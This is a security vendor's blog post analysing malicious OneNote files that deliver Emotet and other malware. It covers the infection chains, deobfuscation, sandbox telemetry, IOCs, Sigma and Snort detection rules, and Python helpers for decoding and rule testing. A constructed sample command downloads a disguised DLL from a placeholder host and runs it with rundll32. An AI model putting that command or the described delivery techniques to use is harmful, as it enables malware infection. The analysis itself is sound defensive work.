Laura

19/05/2023

OneNote malware: A growing threat

This blog was written by Lachlan Godding, SenseOn Security Analyst.

Microsoft OneNote is used by people working in organisations from schools to business consultancy firms for note-taking. 

OneNote is also a growing source of cybersecurity risk. 

The note-taking software’s users are a target for cybercriminals and phishing campaigns. Microsoft OneNote files and OneNote attachments are an increasingly common malware delivery method. Over 50 malware campaigns using Microsoft OneNote for malware distribution were observed in Q1 2023 alone. 

To help security teams combat risk from malicious OneNote files, SenseOn has analysed various strains of malware using OneNote as the delivery vector. We observed these samples in attack campaigns globally throughout early 2023.

This article will discuss the trends observed across these samples and how SenseOn leveraged our state-of-the-art telemetry to gain insight into this attack vector.

In our analysis of malicious OneNote .one samples, we found a common infection chain that security teams can look out for:

Across the samples we analysed, the most common payload was the Emotet trojan. This is regularly spread via malicious emails and is linked to the threat actor Mummy Spider (also known as TA54).

Background

OneNote abuse is a growing threat.

A recent report by Proofpoint found that there has been a significant increase in the abuse of Microsoft OneNote in cyberattacks.

One factor driving this rise is Microsoft disabling automatic macro execution by default in traditional Office tools. This has cut off a traditional initial access pathway for many threat actors.

Another is that cybercriminals need to bypass the Mark-of-the-web (MOTW) security feature, which flags potentially malicious files downloaded from the internet.

To bypass these protection mechanisms, threat actors embed malicious scripts within OneNote ‘.one’ files, which are then delivered to targets as part of attack campaigns.

When opened, the malicious file delivers a second-stage payload. We observed Remote Access Trojans (RATs), such as AgentTesla and AsyncRAT, using this delivery mechanism throughout December 2022. In recent months, other malware strains have become more prevalent among malicious OneNote payloads, including Emotet, IcedID and Qakbot.

OneNote Malware Sample 1

Failed to retrieve 2nd stage due to the domain failing to resolve 

The malicious OneNote document displays a message claiming that the document has remote attachments, to dupe the user into clicking the ‘Open’ icon. Beneath this icon lies an embedded malicious CMD file, ‘Open.cmd’, which executes automatically when the icon is clicked.

Figure 1. Malicious OneNote document with hidden embedded script.

Analysing the malicious script in a text editor shows that it uses PowerShell to execute a Base64-encoded command. The output of this command is written to a file located at ‘C:\programdata’ and subsequently executed.

Figure 2. Contents of the malicious ‘Open.cmd’ script.

Decoding this, the underlying PowerShell command to be executed is revealed.

Figure 3. Decoded PowerShell script contents.

This command is used to silently reach out to an external domain ‘https[:]//starcomputadoras[.]com’ over HTTPS and retrieve a malicious DLL called ‘01.gif’. The .gif file extension is likely a detection evasion mechanism. This file is stored in the local ‘C:\programdata’ directory as ‘putty.jpg’ and immediately loaded using rundll32 and the ‘Wind’ argument. 
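Decoding a launcher's Base64 PowerShell argument is the first triage step for a sample like this one. The following is an added example, not code from the SenseOn write-up: it decodes a -EncodedCommand argument (which carries UTF-16LE text, so it is not the same Base64 you would get from the UTF-8 string) and pulls out the URLs, drop paths and loader use; the command line and domain are constructed placeholders.

```python
# Added example (not from the SenseOn post): decode the Base64 PowerShell
# command a launcher like 'Open.cmd' passes via -EncodedCommand, then pull out
# the first things an analyst wants: URLs, drop paths and loader use.
import base64
import re

# -EncodedCommand carries Base64 of the UTF-16LE script text (not UTF-8),
# so the UTF-8 Base64 of a keyword will not be found inside it.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s'\";]+")
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded script, or '' when no -EncodedCommand argument is present."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return ""
    raw = base64.b64decode(match.group(1))
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        # Some hand-rolled launchers encode UTF-8 instead; fall back rather than fail.
        return raw.decode("utf-8", errors="replace")


def triage(cmdline: str) -> dict:
    """Summarise what a PowerShell command line touches once decoded."""
    script = decode_encoded_command(cmdline)
    return {
        "decoded": script,
        "urls": URL_RE.findall(script),
        "paths": sorted(set(PATH_RE.findall(script))),
        "rundll32": "rundll32" in script.lower(),
        "hidden_window": bool(HIDDEN_RE.search(cmdline)),
    }


# Constructed sample shaped like the Sample 1 chain; the domain is a placeholder.
SAMPLE_SCRIPT = ("Invoke-WebRequest -Uri 'https://example.invalid/01.gif' "
                 "-OutFile 'C:\\programdata\\putty.jpg'; "
                 "rundll32 'C:\\programdata\\putty.jpg',Wind")
SAMPLE_CMDLINE = ("powershell.exe -w hidden -ec "
                  + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode())

if __name__ == "__main__":
    for key, value in triage(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```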

The below telemetry snapshot shows the process chain initiated by running this file.

Figure 4. SenseOn telemetry showing execution of malicious PowerShell script.

Although the domain used for the second stage was flagged as malicious by several online vendors, it was no longer active at the time of analysis. Therefore, the second stage payload failed to download and execute, and we were unable to connect to the malicious URL.

Figure 5. VirusTotal flags the domain as malicious and displays a ‘500’ error indicating it is unreachable.

Figure 6. Malicious https[:]//starcomputadoras[.]com domain can no longer be connected to.

OneNote Malware Sample 2

Emotet

This next sample involved a similar fraudulent popup advising the user to select a ‘View’ icon, which masked a malicious embedded script: ‘press to unlock.vbs’.

Figure 7. Second infected OneNote file with embedded script.

Analysing the contents of this script reveals several layers of obfuscation employed by the author. In this case, the malware author is attempting both to evade detection by automated scanners and to inhibit reverse engineering: variables are assigned randomly generated words, and specific characters are formulaically extracted from those variables to assemble the command that is executed.

Figure 8. Heavily obfuscated contents of the malicious script.

Looking toward the end of this script, we observe a call to create a WScript shell, which is used to run the resulting obfuscated command. 

Modifying the script to echo this command instead of executing it and then running this modified script reveals the unobfuscated contents intended to be run by the original author.

Figure 9. Original tail of malicious script where a call to execute is made.
Figure 10. Modified version of the script, which prints the command instead of executing.
Figure 11. Output of running the modified script.

As seen above, the deobfuscated script appears to use an instance of VBScript to run a created ‘.txt’ file. This file uses a ‘.txt’ extension to evade detection and lower suspicion. Opening this file reveals a similar level of obfuscation: random words are used as variable names, and different parts of these variables are concatenated to build the desired command.

Figure 12. Modified second-stage script to print the command instead of executing.

Similarly, modifying this script to return the command rather than executing it reveals that it was used to retrieve a final payload from a series of malicious domains, trying each listed domain in turn until one succeeded. In this case, submitting the MD5 hash of this file to VirusTotal reveals the payload to be a strain of the Emotet trojan.

Figure 13. Deobfuscated script reveals payload and several malicious URLs.

When this malware is executed in a sandbox environment monitored by the SenseOn agent, several malicious actions can be observed in the raw ingested telemetry and in the security observations SenseOn generates.

The malicious VBScript can be seen retrieving the payload over HTTP from the first of the malicious URLs referenced in the deobfuscated script.

Figure 14. SenseOn telemetry capturing script execution and payload retrieval.

The malware then abused the native ‘regsvr32.exe’ process to run a series of malicious binaries with seemingly randomly generated names, some of which were executed with the ‘/scomma’ argument, all run from the \AppData\Local\Temp directory.

Figure 15. Security observation generated by SenseOn for unusual activity from %AppData%.
Figure 16. SenseOn telemetry capturing execution of malicious binaries.

Regsvr32 was also abused to establish Command and Control (C2) using connections to nodes in the Tor network.

Figure 17. SenseOn telemetry showing outbound connections by regsvr32 to Tor nodes.

Tor is likely used in this case to provide the author with an additional layer of anonymity and increase the difficulty of detection and remediation using traditional toolsets. 

Figure 18. SenseOn security observation generated in response to Tor traffic.
Figure 19. SenseOn telemetry showing execution of ‘I7BUGMOAp1mnW79z5M0bLi0WI5oFMy2wIqc.dll’.

Regsvr32 was additionally leveraged to run a malicious DLL file, “I7BUGMOAp1mnW79z5M0bLi0WI5oFMy2wIqc.dll”. This DLL executed a series of information-gathering commands such as ‘systeminfo’ and ‘ipconfig /all’.

These are often used as enumeration techniques to determine device vulnerabilities and locations of interest to begin the process of propagation.

Figure 20. SenseOn security observation created for anomalous use of regsvr32.
Figure 21. SenseOn telemetry capturing enumeration commands by regsvr32.
Figure 22. SenseOn security observation generated in response to unusual outbound connections by regsvr32.

To maintain persistence on the infected machine, the malware configures the malicious DLL file to be run automatically by Regsvr32 at device startup, adding itself to the HKEY_USERS\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry location.

Figure 23. SenseOn telemetry capturing the malicious startup item.

IOCs

Domain IOCs


IP IOCs


MD5 Hash IOCs

cde1a4983674221e32035465ff72c577
9eae6f49a02d6eb9f75af7bbf4349808
c862aed0ddd602cafc5bfdf212e0bd4d

Detections 

SIGMA Rules

title: Detect Regsvr32 Binary execution
description: Detects when regsvr32 executes an exe file other than an instance of itself
status: experimental
author: Lachlan Godding
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    ParentImage|endswith: '\regsvr32.exe'
    Image|endswith: '.exe'   # '\.exe' would only match a path ending in a literal '\.exe'
  filter:
    Image|endswith: '\regsvr32.exe'
  condition: selection and not filter
level: high

title: Detect Regsvr32 enumeration command
description: Detects when regsvr32 runs commands commonly used for enumeration
status: experimental
author: Lachlan Godding
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    ParentImage|endswith: '\regsvr32.exe'
    Image|endswith:
      - '\systeminfo.exe'
      - '\ipconfig.exe'
  condition: selection
level: high

title: Powershell downloading unusual file types
description: Detects when PowerShell, launched from cmd.exe, makes a web request to download suspicious file types
status: experimental
author: Lachlan Godding
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    ParentImage|endswith: '\cmd.exe'
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - 'invoke-webrequest'
      - 'SW52b2tlLVdlYlJlcXVlc3Q='   # base64 version
  filter:
    # optionally adjust these to represent normal file types for the environment
    CommandLine|regex:
      - '-uri.*\.txt'
      - '-uri.*\.msi'
      - '-uri.*\.json'
      - '-uri.*\.csv'
      - '-uri.*\.pdf'
  condition: selection and not filter
level: high

title: OneNote spawning unusual child process
description: Detects OneNote spawning suspicious child processes (not browser or office)
status: experimental
author: Lachlan Godding
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    ParentImage|endswith: '\onenote.exe'
  filter:
    Image|endswith:
      - '\msedge.exe'
      - '\msedgewebview2.exe'
      - '\chrome.exe'
      - '\firefox.exe'
      - '\opera.exe'
      - '\brave.exe'
      - '\iexplore.exe'
      - '\winword.exe'
      - '\excel.exe'
      - '\powerpnt.exe'
      - '\acrord32.exe'
      - '\acrobat.exe'
      - '\onenotem.exe'
      - '\outlook.exe'
      - '\teams.exe'
      - '\notepad.exe'
      - '\protocolhandler.exe'
      - '\onenote.exe'
      - '\ai.exe'
      - '\splwow64.exe'
  condition: selection and not filter
level: high
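Before deploying rules like these it helps to check their match behaviour against representative events. The following is an added example, not part of the SenseOn post: the intended logic of the three process_creation rules above (regsvr32 spawning an .exe, regsvr32 running enumeration tools, OneNote spawning a non-allow-listed child) reimplemented in Python and run over constructed Sysmon-style events, which also shows that an enumeration tool launched by regsvr32 fires both regsvr32 rules.

```python
# Added example (not part of the SenseOn post): the three process_creation
# rules above, reimplemented as plain Python and run over constructed
# Sysmon-style events so their match behaviour can be checked before deployment.
from typing import Dict, Iterable, List

# Allow-list taken from the OneNote rule's filter (shortened; extend as in the rule).
ONENOTE_EXPECTED_CHILDREN = {
    "msedge.exe", "msedgewebview2.exe", "chrome.exe", "firefox.exe", "winword.exe",
    "excel.exe", "powerpnt.exe", "outlook.exe", "teams.exe", "notepad.exe",
    "onenote.exe", "onenotem.exe", "protocolhandler.exe", "splwow64.exe",
}
ENUMERATION_TOOLS = {"systeminfo.exe", "ipconfig.exe"}


def image_name(path: str) -> str:
    """Case-folded file name, so a path ending in ONENOTE.EXE compares as 'onenote.exe'."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the titles of the rules this event matches."""
    parent = image_name(event["ParentImage"])
    image = image_name(event["Image"])
    hits = []
    # selection: parent is regsvr32 and child is an .exe; filter: child is regsvr32 itself
    if parent == "regsvr32.exe" and image.endswith(".exe") and image != "regsvr32.exe":
        hits.append("Detect Regsvr32 Binary execution")
    if parent == "regsvr32.exe" and image in ENUMERATION_TOOLS:
        hits.append("Detect Regsvr32 enumeration command")
    if parent == "onenote.exe" and image not in ONENOTE_EXPECTED_CHILDREN:
        hits.append("OneNote spawning unusual child process")
    return hits


def scan(events: Iterable[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each event's ProcessId to the rule titles it triggers."""
    return {event["ProcessId"]: evaluate(event) for event in events}


def event(pid: str, parent: str, image: str) -> Dict[str, str]:
    return {"ProcessId": pid, "ParentImage": parent, "Image": image}


# Constructed events echoing the chains in Samples 1 and 2 (file names are placeholders).
EVENTS = [
    event("1", r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE", r"C:\Windows\System32\cmd.exe"),
    event("2", r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE", r"C:\Program Files\Microsoft\Edge\msedge.exe"),
    event("3", r"C:\Windows\System32\regsvr32.exe", r"C:\Windows\System32\systeminfo.exe"),
    event("4", r"C:\Windows\System32\regsvr32.exe", r"C:\Windows\System32\regsvr32.exe"),
    event("5", r"C:\Windows\System32\regsvr32.exe", r"C:\Users\user\AppData\Local\Temp\xq81mz.exe"),
]

if __name__ == "__main__":
    for pid, titles in scan(EVENTS).items():
        print(pid, titles or "no match")
```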

Snort

alert tcp any any -> any any (msg:"Potential Emotet User Agent Detected"; flow:to_server,established; content:"User-Agent|3a| Mozilla/5.0 (Windows NT 6.1; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0|0d 0a|"; nocase; sid:1000001; rev:1;)